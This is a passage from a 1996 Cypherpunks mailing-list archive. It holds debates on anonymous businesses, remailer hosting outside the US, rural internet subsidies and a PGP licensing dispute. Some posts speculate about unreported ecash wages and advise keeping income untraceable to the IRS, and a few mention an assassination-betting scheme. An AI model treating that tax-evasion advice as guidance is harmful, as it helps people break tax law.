No, we will not write for more info.  Why not?  Gee, maybe because you
are posting to a group that advocates strong privacy, something that
the US gov't has always frowned upon?  Maybe because you're asking us
to respond to a .mil site with an obviously contrived address?  Are
.mil sites not US military?  I think so.

Where do some people get off?

-Robin
PS: If .mil sites are, in fact, some country code, please ignore this
message and do not propogate the thread.  If you feel you must flame,
send it to me directly.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 16 May 1996 15:32:47 +0800
To: cypherpunks@toad.com
Subject: RE: Why does the state still stand:
Message-ID: <9605152158.AA06933@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 15 May 96 at 17:32, Black Unicorn wrote:


> I disagree.  The key is prior or on site clearing.  Anonymous
> businesses will have to depend more on reputation, and even
> reputation has its limits when it comes to parties that obviously
> have no accountabilty at all.
> 
> Participants in such a market will have to be wary of the "last
> shot" or "last round" problem.  (Specifically that one party to the
> transaction may no longer wish to participate in the market, and not
> need to and thus is free to screw the market, "cash in" his
> reputation and retire on the proceeds as a result.
> 
> Still, escrows or multiple escrows will be the answer here.


> > Again, depending on the context, AP might wery well be the only
> > solution or be no workable solution at all.
> 
> Now, tell me how AP is a solution if everyone in the corporation is
> double blinded?  Who do anonymous parties put out betting pools on?

Agreed.  I just supposed there might be some of the involved entities 
that are not totally anonymous.  I don't think that you'd deliver 
completely anonymously a bulldozer or any other physical goods to 
some "anonymous" address.  Somehow, if the transaction involves 
anything physical, there is potential for a anonimity breach.


> > Any physical currency can be made traceable (put a chemical or
> > radioactive tracer or a zillion other tricks...)
> 
> And so?  Because I possess or have received cash from someone does
> not mean that it is mine, nor that I earned it, nor that I am not
> merely holding it, nor that I am not acting as trustee.

Agreed too.  But still, it might attract troublemakers.
 
> Income tax and currency taxes depend on realization events.  Even in
> the strictest sense, realization is a thin and vague concept.

Since I am not a layer, would you care to elaborate a bit more on 
that?
 
> Your only remaining option is to tax possession of currency.  Good
> luck.

Why?  Don't they already do that through Tax on Capital?



> Again, who are you going to kill?

Nobody.  I thought that through you long law studies, you did learn
to read... Or is it my english that is too imperfect?

Dear Unicorn, what in the hell makes you concludes that my
"disclaimer" means that I am going to kill somebody?  I just say that
after having turned the idea around for some time, I see it as
ineluctable that *some* groups will implement it.  Just bring me
*one* single fact of reality that will show me that it is not
possible to implement and you will have made my day.  Even if it is
implemented for any entirely wrong reason, I do not think that we
can prevent it's implementation.

BTW, since I was off from CPunks for a while, would you please tell 
me if you published the suite of you writings on assets concealement?
I would then proceed to get it from the archives if it was published.

Regards.

JFA

 DePompadour, Societe d'Importation Ltee  
 Limoges porcelain, Silverware and mouth blown crystal glasses

 JFA Technologies, R&D consultants.
 Physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 16 May 1996 16:17:32 +0800
To: hfinney@shell.portal.com
Subject: Re:  Why does the state still stand:
Message-ID: <01I4QPUDNJ2S8Y5DBN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hfinney@shell.portal.com"  "Hal" 15-MAY-1996 00:14:06.38

>I think the intention then is to create "fully anonymous" companies.
>These would be organizations whose principals and employees are known
>only by pseudonyms, even to each other.  Their only contact is
>electronic, via an anonymous network.  And the employees are paid in
>anonymous ecash, which they don't pay taxes on since it is unreported
>income.

	The anonymous network would appear to be a possible weak point. If
governments keep shutting down remailers and other such devices, then it won't
work. Therefore, I've been doing some preliminary work in this area. My first
result is as follows.
        One subject that has come up recently is that of remailer operations
in countries outside the United States, so as to chain them to produce
jurisdictional headaches. The following is a preliminary list of companies and
organizations that might be used to run an out-of-US remailer, assuming
telnetting to a UNIX shell. In selecting these, I generally excluded: ones in
authoritarian countries (e.g., China and Singapore); ones that appear to be
government-run; ones where they didn't appear to understand English very well;
ones in the European Community (except for a few such as Malta that don't
cooperate very well with the European Community); ones that charge for mail
volume; and ones that stated they did not run shell accounts. I did not
include offshore.com.ai in Anguilla due to its high cost; I consider anything
over 25$ a month to be impractical.

_Country/Area_  _Name_                          _Email_
Anguilla        Cable & Wireless                webmaster@candw.com.ai
Antigua         Cable & Wireless                scholla@candw.ag
Barbados        CaribSurf                       webmaster@caribsurf.com
Denmark         cybernet.dk                     info@cybernet.dk
Finland         Clinet Ltd                      clinet@clinet.fi
Finland         Net People Ltd                  helpdesk@netppl.fi
Finland         Xgateway Finland Ltd*           pal@xgw.fi
Iceland         Multimedia Consumer Services    mmedia@mmedia.is
Isle of Man     Advanced Systems Consultants**  info@advsys.co.uk
Jamaica         InfoChannel                     icquery@infochan.com
Liechtenstein   Ping Services                   afink@ping.ch
Liechtenstein   Online Store AG                 webmaster@onlinestore.com
Malaysia        MIMOS                           mal@mimos.my
Malta           maltaNET                        info@maltanet.omnes.net
Sweden          FX AB                           fx@uni-x.se
Sweden          Internet One**                  Support@one.se
Sweden          Kajplats 305                    info@kajen.malmo.se

* = This organization has on its main page a link to a document called the
"Declaration of an Independent Internet." It thus may be possible to persuade
them to support a remailer at reduced or no charge as part of this.

** = This organization's main page has the EFF blue ribbon, unlike others.


        I would appreciate comment on all aspects of this list. These include:
additional companies and countries to add; companies or countries to take off
(international politics & law is not my subject); and suggestions about where to
look for more (it is quite possible that I did not locate all the lists of
out-of-US ISPs).
	Once I have some feedback on which ones to check with, I'll email them
and ask about prices (in US dollars), further information on policies,
etcetera.
        -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 16 May 1996 16:47:33 +0800
To: tcmay@got.net
Subject: Re: Rural Datafication (Was Re: Edited Edupage, 9 May 1996)
Message-ID: <01I4QQHYPQUY8Y5DBN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 15-MAY-1996 02:31:15.60

>A consequence is that many customers leapfrog right over local cable and go
>directly for satellite dishes. While the local community cable systems and
>their government partners could (and did) keep out other cable competitors,
>this became less and less possible with satellite dishes. Zoning laws were
>used to limit BUDs (Big Ugly Dishes, the big 8-foot and larger C-band
>dishes). But as the Ku-band dishes (mentioned favorably in my 1988 Crypto
>Anarchist Manifesto, interestingly enough) became available, even the most
>restrictive zoning ordinances became unenforceable....dishes could be in
>attics, on balconies, even covered with fake boulders!

	The courts are also (sensibly) seeing zoning laws attempting to outlaw
such small dishes as being completely ridiculous.

>In my own case, I skipped cable and installed a DSS dish...150 or more
>channels, at least 20 movies on at any given time (not even counting the
>Pay Per View movies, of which there are at least 30-40), financial news,
>CNN, etc. Plus, a digital output connector for (Real Soon Now, they claim)
>a PageSat-type Usenet and Web page feed, using phone links for the back
>link. I submit this as an example of where the free market is providing a
>better solution than "community access cable" did. In fact, the
>socialization of cable held cable back.

	I've gone even farther than that - I don't bother with having a TV, I
just get my info from the net. There is the problem with the satellite net
links that it tends to concentrate data production & distribution into
relatively few hands, from which it can easier be taken by government and other
forces. Larger corporation, despite the influence their size gives them, can
be easier to pressure than the small ones. Look at Compuserve in Germany, for
instance - they were having pressure from Christian Coalition types, etcetera,
and used the German investigation as an excuse.
	On the other hand, this is also a very good argument against rural
subsidies being necessary - if people want net access and are educated and
smart enough to afford it (and thus be able to use it properly), they can get
it even if they're in the wilds of Montana.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daemon@anon.penet.fi
Date: Thu, 16 May 1996 05:15:15 +0800
To: cypherpunks@toad.com
Subject: Anonymous password assignment failure (no password)
Message-ID: <9605151414.AA26451@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


You have requested the assignment of a new password
However, your message text didn't contain any password.
Remember that passwords should only contain letters and numbers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 16 May 1996 15:39:55 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: RE: Why does the state still stand:
In-Reply-To: <9605151745.AB23065@cti02.citenet.net>
Message-ID: <Pine.SUN.3.93.960515172511.10635D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, Jean-Francois Avon wrote:

> On 14 May 96 at 22:01, blanc wrote:
> 
> > 3 problems which immediately come to mind:
> > 
> > .  What if someone, hired on one occasion but fired at another,
> > decides in anger to "turn coat" and report everyone to the IRS (or
> > other fine government agency)?
> > 
> > .  What if a company does not pay as expected - other than adopting
> > Assassination Politics, what method could an employee use towards
> > getting their expected remuneration for work done?
> 
> The nature of anonimity, IMO, precludes any legal mechanism since the 
> anonymity structure was established precisely to avoid any legal 
> consequences.
> 
> Here, I might be tempted to differeciate between two cases:
> 1) the entity who wants to get out of the reach of the governmental 
> system
> 2) the entity who wants to get out of the reach of everybody (to con 
> others)
> 
> The only problem is, how will you differentiate between 1) and 2) 
> *before* a conflict arises?
> 
>   The involved party would then have to resort to use 
> some sort of unofficial tribunal.  It would create a set of parrallel 
> law system, and as much of them as there would be groups doing 
> business together.

I disagree.  The key is prior or on site clearing.  Anonymous businesses
will have to depend more on reputation, and even reputation has its limits
when it comes to parties that obviously have no accountabilty at all.

Participants in such a market will have to be wary of the "last shot" or
"last round" problem.  (Specifically that one party to the transaction may
no longer wish to participate in the market, and not need to and thus is
free to screw the market, "cash in" his reputation and retire on the
proceeds as a result.

Still, escrows or multiple escrows will be the answer here.

 
> Again, depending on the context, AP might wery well be the only 
> solution or be no workable solution at all.

Now, tell me how AP is a solution if everyone in the corporation is double
blinded?  Who do anonymous parties put out betting pools on?

[As AP has been discredited in this application, your argument for it is
deleted.]

> > .  Wouldn't everyone need to have two jobs (or source of regularly
> > accepted cash), in order to be able to pay for services where
> > suppliers do not accept virtual cash transactions? (TCM has
> > mentioned before about the need to pay for some things in tiny
> > quantities - like quarters for a phone call, etc.)
> 
> Any physical currency can be made traceable (put a chemical or
> radioactive tracer or a zillion other tricks...)

And so?  Because I possess or have received cash from someone does not
mean that it is mine, nor that I earned it, nor that I am not merely
holding it, nor that I am not acting as trustee.

Income tax and currency taxes depend on realization events.  Even in the
strictest sense, realization is a thin and vague concept.

Your only remaining option is to tax possession of currency.  Good luck.

> JFA

[...]

> THE SYSTEM FROM BEING IMPLEMENTED.  IMO, IT IS UNAVOIDABLE.

Again, who are you going to kill?

> 
>  DePompadour, Societe d'Importation Ltee  
>  Limoges porcelain, Silverware and mouth blown crystal glasses
> 
>  JFA Technologies, R&D consultants.
>  Physists, technologists and engineers.
> 
>  PGP keys at: http://w3.citenet.net/users/jf_avon
>  ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daemon@anon.penet.fi
Date: Thu, 16 May 1996 07:16:29 +0800
To: cypherpunks@toad.com
Subject: Anonymous message failed (wrong password)
Message-ID: <9605151433.AA01155@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


The message you sent to the anonymous server could not be processed, as your
password (in the X-Anon-Password: header) didn't match the one stored in the
server. Either you have made a mistake, or somebody has used your account and
changed the password. If the latter is the case, please contact
admin@anon.penet.fi. You can check your current password by sending an
(empty) message to send-password@anon.penet.fi.

Contents of failed message:

 -------------------------
X-Envelope-To: <nick@anon.penet.fi>
Received: from mail.crl.com(165.113.1.22) by anon.penet.fi via anonsmtp (V1.3mjr)
	id sma008018; Sun May 12 06:14:37 1996
Received: from crl2.crl.com by mail.crl.com with SMTP id AA19905
  (5.65c/IDA-1.5 for <nick@anon.penet.fi>); Sat, 11 May 1996 23:10:02 -0700
Received: by crl2.crl.com id AA10484
  (5.65c/IDA-1.5 for nick@anon.penet.fi); Sat, 11 May 1996 22:56:53 -0700
Date: Sat, 11 May 1996 22:56:53 -0700
Message-Id: <199605120556.AA10484@crl2.crl.com>
To: nick@anon.penet.fi
Subject: Cyber An@rchy
From: cypherpunks@toad.com

x-anon-password: have-fun




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 16 May 1996 16:44:46 +0800
To: blancw@accessone.com
Subject: Re: Why does the state still stand:
Message-ID: <01I4QRA5NDSG8Y5DBN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"blancw@accessone.com"  "blanc" 15-MAY-1996 03:52:18.03

>.  What if someone, hired on one occasion but fired at another, decides =
>in anger to "turn coat" and report everyone to the IRS (or other fine =
>government agency)?

	Well, full anonymnity should stop this one from being a problem,
although one should still consider topics such as forensic stylometry - if
someone squeals and starts keeping messages (plus any earlier kept innocently),
it may be possible to figure out who's who from these. I'm currently checking
into forensic stylometry; I can see the possibility of programs to run
stylometry on one's own email/posting, with suggestions for alternative
vocabulary, etcetera when you fall into too much of a pattern. A related
problem is that of government agents signing on.
	Both of the above are made more acute by the possibility that some
information, if revealed, might enable the government to disrupt activities -
even if it doesn't enable prosecution. Making sure that the participants have
a strong stake in behaving properly - e.g., shares in the outcome, ecash
deposits, and - most importantly in dissuading governmental intervention -
reputation riding on it. The last is most important in dissuading governmental
intervetion because of the reserves of wealth the government is likely to have
for some time; they can afford to pay (using your and my tax dollars) for
the short-term costs to a subject. Paying for longer-term costs (e.g., the
loss of the ability to work due to reputational diminishment) is not as
practical, and is usually only done for very important cases (e.g., the
Witness Protection Program). An additional aspect of the last is that if
someone has a poor (or no) reputation, you shouldn't trust them with much
damaging information or responsibility. If government agents keep blowing
various covers, none of their covers will have much reputation capital.

>.  What if a company does not pay as expected - other than adopting =
>Assassination Politics, what method could an employee use towards =
>getting their expected remuneration for work done?

	A combination of escrow agencies and reputation capital appears to
work here. It does have the problem for escrow agencies that they will either
have to be above-board - and thus subject to governmental pressure - or
anonymous - and thus not particularly trustworthy until they've built up
reputation capital. But how do they build up reputation capital in the first
place? Hmm.... what one needs is a way to transfer reputation from a public,
identifiable source to a new pseudonymous source. Some cryptographic thought
on this idea has been had; I will leave it up to the experts to discuss it.

>.  Wouldn't everyone need to have two jobs (or source of regularly =
>accepted cash), in order to be able to pay for services where suppliers =
>do not accept virtual cash transactions? (TCM has mentioned before about =
>the need to pay for some things in tiny quantities - like quarters for a =
>phone call, etc.)

	Intersections between the virtual and regularly accepted cash economies
are an interesting subject; Sasha has written about this before on here.
Essentially, money-changing is likely to be a significant enough source of
profit that someone will be willing to do it. Now, regularly accepted cash
will have the limit that the IRS et al will want to know its source. Thus,
one should probably use as little of it as possible, and that only in
untraceable ways - investments et al should be done via virtual cash. There
is the problem of that one has a certain minimal reasonable spending, for
the source of which the IRS is likely to look.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 18 May 1996 20:40:25 +0800
To: cypherpunks@toad.com
Subject: [long irrelevant post] Edited Edupage, 9 May 1996
Message-ID: <9605152312.AA10462@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Apologies to other CPunks.  I hate theses posts, but I just couldn't 
let it pass by.

On 15 May 96 at 9:09, Doug Hughes wrote:

> No, because they are too poor to live in your neighborhood.
> Sure, they can live in the same geographic region, but it's still
> rural and poor. People live where they can afford to live. 
Just like volition-free cows?


> Are you saying those poor people in rural West Virgina only live
> there because they are not trying hard enough to get out?

Maybe they lack the knowledge.  But does that justify turning me
into a milk cow for them?  Should I break my leg because somebody
else did?  Should the common euphemism "to provide" justify the
common euphemism "to redistribute wealth"?  Or in straight talk,
should we distribute free-lunches that were took away at the point
of a gun from peoples who produced them by their own work?

 
> >> So, because they live in a poor district they are
> >> not entitled to the same level of education as a rich city
> >> suburb?
Not because they don't live in a rich suburb, simply because they 
cannot pay for it.  Breathing air does not entitle you to anything that 
is produced by another breather of air...


> environment, lack of education, lack of money, lots of factors.
Who is responsible for it, who should be considered "response-able"?

> Nobody is holding a gun to anybody's head saying "Don't Read".
Here is an example of "creative mis-reading".  What I meant by gun is 
why hold a gun to *my* head for having them to read?


> improving literacy is a goal that needs to be undertaken. 
You are free to donate as much of your *own personnal* earnings to 
them.  Feel free to do!

I, for one, like to help kids to learn to read, to use a microscope, 
to learn chemistry and physics and maths and sciences in general.  I 
always give my time to any kid that needs help, wether he is 5 years 
old in first grade or 25 in university.  But why stick a gun in my 
back to get part of my paycheck?

> agree that low literacy is a bad thing
Yes, absolutely.

> and needs to be taken care
> of? 

At whose expense?

> But, why, given a good learning environment and an
> inspiring teacher would you not want to?

You'd be surprized how so many peoples just don't care.  We have here 
a *free* education system up to high school.  Then college, which is 
not very expensive.  Then university that cost around 2000$(US) per 
year.  But still, we have one of the highest rate of dropping out in 
the world.  And all collectivists their with grand schemes wonder why...

> But the statement that
> we shouldn't subsidize >> rural customers because they CHOOSE to
> live there (even though some >> are poor and can't afford to live
> anywhere else) is just plain >> fallacious.

Agreed.  But you are building a worst straw man.  The only reason is
that we should not turn some productive individuals into a milk cow
for thoses that are less productive.  And the source of the whealth
necessary for your grand schemes are those most productive
individuals turned into sacrificial animals.  Under any governmental
red tape pile of paper lies a GUN.


> Some people on this list argue that the current representative govt
> system is bad, and that true democracy is better.
But again, some other peoples think that true democracy, i.e. the 
dictature of the majority, wouldn't be better, mainly because the 
issues are too numerous and the individual's knowledge is too 
limited.  Some Cypherpunks want, is "Live and let live", some other "Live 
and let die" and a few even proposed "Live and let live, of get 
killed" or "mind your own business or get a prize on your head"... 

> True democracy relies on people being educated, the more the
> better. (Actually, education benefits the entire society.)


 
> >> Just because you choose to live in the city does not
> >> mean people always choose to live where they live.

> >Who cast their feet in concrete blocks?

> Where is somebody making less than $5000/year going to move to?
> (Answer: somewhere rural and poor).  Or, if you prefer, they can
> move into tax-payer subsidized housing? (I'd prefer not, thanks)

I lived on that for several years.  It was not easy but I could still 
learn and read.  Actually, it is almost the sole thing I did during 
theses years.  And I am not talking about our almost free education 
system.  

> >> Education is one
> >> thing (perhaps the only thing) that deserves to be subsidized in
> >> this country. 
> >I think that it should not be subsidized.

> >If you feel like subsidising education, then by all means, do it. 
> >But why should you stick a gun in my back to do the same?  What if
> >I do not want to do the same as you?

> Then you will be living in a country with lower education standards,
> increasing illiteracy, and a pretty pitiful base with a declining
> socio-economic structure.



> Are you arguing that people are not equal
Absolutely.  Why is it that my friends always got straight A's while 
I got C's or D's...

> and those with more money should of necessity get better education?

What somersault of rationalization made you conclude that?
Thoses with more money can *afford* more.  Only that fact.

> You can vote that poor people shouldn't be
> educated at all

What you are telling here is that education is *only* a direct 
function of wealth and that wealth is strictly a direct function of 
education.  I am sorry to tell you that reality clearly show that 
this basic premise is not true.


> You don't understand at all. It's not about being people down, it's
> about bringing them 'UP'.

Dear Doug, would you please tell me where you will take the 
ressources to bring peoples up?  I have no objection if you were 
setting up some sort of charity fund.


> I'm not talking about being meek.
> I'm talking about learning to read and multiply 4*9.
It was done in the days of non-mandatory, non-subsidized education.  

Actually, the country (USA) had it's biggest growing period in thoses 
days.  The improvement slowed down with the advent of collectivist 
schemes.


> I'm not getting into this anymore. It's totally off topic of the
> list, but I felt I had to respond to your
> let-the-poor-be-poor-and-uneducated posting.

Not at all.  The essence of my post is "do not treat productive individual as 
sacrificial animal for the unearned benefit of the less productives".

You see, I do not believe in sacrifice nor in original sin...

> We're straying far off even my point. My point was not that I agree
> with subsidizing internet connections for every school in america.
> I'd have to be convinced that that is a good thing. However, making
> sure everybody has a good education is of paramount importance to
> any society.

I am of the opinion that giving the country a thorough coverage of 
the net is of paramount importance.  But I do not think that the govt 
is thinking the same, notwithstanding what it says.

I suggest you try to set up a foundation to promote the private setup 
of inter-villages links in rural areas.  It would be great.

But to tax for that, to confiscate money from producers against their 
best judgment and will?

OTOH, you might be operationnally (while not ethically) right.  I'd
rather be taxed for the installation of the net than for some
museum...

JFA

 DePompadour, Societe d'Importation Ltee  
 Limoges porcelain, Silverware and mouth blown crystal glasses

 JFA Technologies, R&D consultants.
 Physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 18 May 1996 19:26:48 +0800
To: cypherpunks@toad.com
Subject: Re: Rural Datafication (Was Re: Edited Edupage, 9 May 1996)
Message-ID: <9605152310.AA10372@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 15 May 96 at 15:03, Jim McCoy wrote:

> US decided (via it's legislative system, regardless of whether or
> not it was the "smart" thing to do) a long time ago that it was a
> worthwhile goal to give everyone, regardless of where they lived,
> equal access to certain parts of the national infrastructure.

The US decided that the end justifies any means, and thus decided to 


> Actually they would put your money where your mouth is.  If such
> subsidies were not given then rural dwellers (those people who grow
> all the food that keeps you alive...) would just add the cost to
> food production and therefore add to the cost of what you eat.

They are free to charge more. Oh, I forgot, prices are regulated...

When grand'pa came to Canada in 1912 with his parents and his 11
brothers and sisters, he and they did not have a penny, nor did they
speak the language nor had access to any socialistic programs.  When
he and his sister and brothers died, most of them were wealthy.  And
all they did all their life was to grow vegetables.  They had very
good reputations and I do not know any story of any one of them being
con men. `

> It is rather amazing how this posting has drawn all of the
militant > libertarians out of the closet. 

Why assume that I hid in some closet? I did not militate either.  I
do not endorse libertarian ideas.  I've never read any "libertarian"
litterature.  I only read a bit of Ayn Rand, and the regular
Objectivists will tell you that they are *not* libertarians. Actually
they object to the libertarian doctrine.  And again, I am no
objectivist.  Many of them refuse to talk to me.

> > If there was such a perceived advantage, they would make it their
> > priority.  Parents would be willing to buy the necessary hardware
> > and then, put the little extra that is required to connect.
> > Remember, the costliest part of the internet is the hardware to
> > run Netscape.

>From a consumer standpoint, it is.  Unless I am wrong.  Can you bring 
up figures?

> You have obviously never had anything to do with connecting people
> to the internet, have you?  After spending the last four years prior
> to my current job bulding one of the largest ISPs in Texas I can
> promise you that getting the dedicated line from one location across
> a LATA into another where connectivity is a non-metered local phone
> call from your subscribers is a very costly affair (the line charges
> are per-mile, and here in the US you may have to run your wire
> 100-250 miles to get to the next LATA) 

Why don't you just use a microwave link?  Oh, I forget, the FCC might 
not permit it...  And then, why don't you just get together all the 
bunch of peoples and decide to obtain a right of way for a community 
cable that would carry data?  And while you are at it, maybe you can 
try a fiberoptic company to subsidize you, tax-deductible from their 
income... It's worth a shot!  Oh, but again, the FCC and half a dozen 
other ministry might object.

You don't find enough donations? No problems, simply sell your 
project, aided by your reputation, to every neighboor.  Simply issue 
shares to raise money...  Oh, again, I forgot, the SEC would 
object...

How does a data link cost compare (long term and short term) to the 
initial expense of purchasing a computer?  Like, since you mentionned 
it, how much did your project cost per user?

> You seem to be falling into
> the same line of thinking which most annoys me about Libertarians,

You are too sensitive... :-)

> you ignore the cost of building and maintaining the infrastructure
> in the first place

Not at all.  We only realize that the cost of building 
infrastructures in *this* statist world is almost not affordable.

Why don't you read about railroad history and come back later?

JFA

 DePompadour, Societe d'Importation Ltee  
 Limoges porcelain, Silverware and mouth blown crystal glasses

 JFA Technologies, R&D consultants.
 Physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Voorhees" <mark@infolawalert.com>
Date: Sat, 18 May 1996 04:06:18 +0800
To: "cypherpunks@toad.com>
Subject: Zimmermann v. Viacrypt
Message-ID: <199605152213.SAA25898@park.interport.net>
MIME-Version: 1.0
Content-Type: text/plain


There is a story @

http://infolawalert.com/stories/051796a.html

describing how Phil Zimmermann is trying to
retrieve all the rights to PGP from ViaCrypt
in order to jump start his new venture, PGP, Inc.

He's taking a sell out or get sued approach with
ViaCrypt, which until recently has not had much
success marketing PGP.

Mark




** Mark Voorhees
** Information Law Alert
** mark@infolawalert.com
** http://infolawalert.com
** + 1 718 369 0906
** + 1 718 369 3250 (fax) 
*************************
* * * * * * * * * * * * *






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 18 May 1996 13:03:27 +0800
To: cypherpunks@toad.com
Subject: Re: Rural Datafication (Was Re: Edited Edupage, 9 May 1996)
Message-ID: <adbfced90202100490cc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:10 PM 5/15/96, E. ALLEN SMITH wrote:

>        I've gone even farther than that - I don't bother with having a TV, I
>just get my info from the net. There is the problem with the satellite net
>links that it tends to concentrate data production & distribution into
>relatively few hands, from which it can easier be taken by government and other
...

Just to make it clear, the _least_ of _my_ reasons for having a satellite
dish and televisions in general is to "get info." (Though even when I do
want to "get info," I tend to turn to CNN, CNBC, PBS, etc., and not to use
the generally short summaries that are carried on the Net, sans video of
course.)

I won't argue for television pro or con...I'm sure most folks here have met
people who are religiously anti-television and who radiate superiority in
pointing out that the last time they saw a television program was when
"Nicholas Nickleby" was broadcast. Whatever.

But having both a video/satellite system and, obviously, a Net/Web system,
they are very different things.

To each their own.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 18 May 1996 07:18:48 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <199605151758.KAA25847@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.93.960515182525.10635F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



I would really like to see a remailer that is somehow blinded.

I don't know enough about how mail paths are generatered, but is it
impossible to conceal the origin of remailer postings?

Postings made to remailernym@alpha.c2.org would be spit out somewhere but
without accountability?

Impossible?  Would do wonders defeating traffic analysis.

I'd consider running a remailer, but after listening to the response to
the anonymous poster a while back, it sounds like there are few if any
simple options which do not require major time and effort to setup and
run.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 18 May 1996 11:57:28 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: RE: Why does the state still stand:
In-Reply-To: <199605152154.OAA24839@netcom8.netcom.com>
Message-ID: <Pine.SUN.3.93.960515183032.10635G-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, Bill Frantz wrote:

[Anonymous corporations]

> What may be a problem for such a company is a social problem.  All the
> creative groups I have worked with have had close personal relations. 
> (Although they have not had wide agreement on significant non-work
> subjects!)  I don't know if good, creative, group-produced products can be
> built without such a relationship.  Does anyone know of an example of such
> a product from an "anonymous" environment?

So make it a nym relationship instead.
Hell, with increased bandwidth, you could use PGPphone and some mild voice
disguising and have teleconfrences.

> ------------------------------------------------------------------------
> Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
> (408)356-8506     | lost jobs and  | 16345 Englewood Ave.
> frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Sat, 18 May 1996 06:20:44 +0800
To: rpowell@algorithmics.com
Subject: Re: (Fwd) New Anonymous Remailer
Message-ID: <199605152317.SAA28399@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Do we se a problem here?  No? Then read on...
> 
>     > You may be familiar with anon.penet.fi, which give you an
>     > anonymous account.
> 
>     > Our service allows YOU to choose what the return address will be!
> 
>     > Please write for more info.
> 
> Well, well, well.  Let's see: 
> Yes, we are familiar with anon.penet.fi... And all of the better
> options available.

Heh... it gets better.  I very foolishly sent off
for more info; among their requirements: you pay $5
a month for the service; you can't receive mail, only
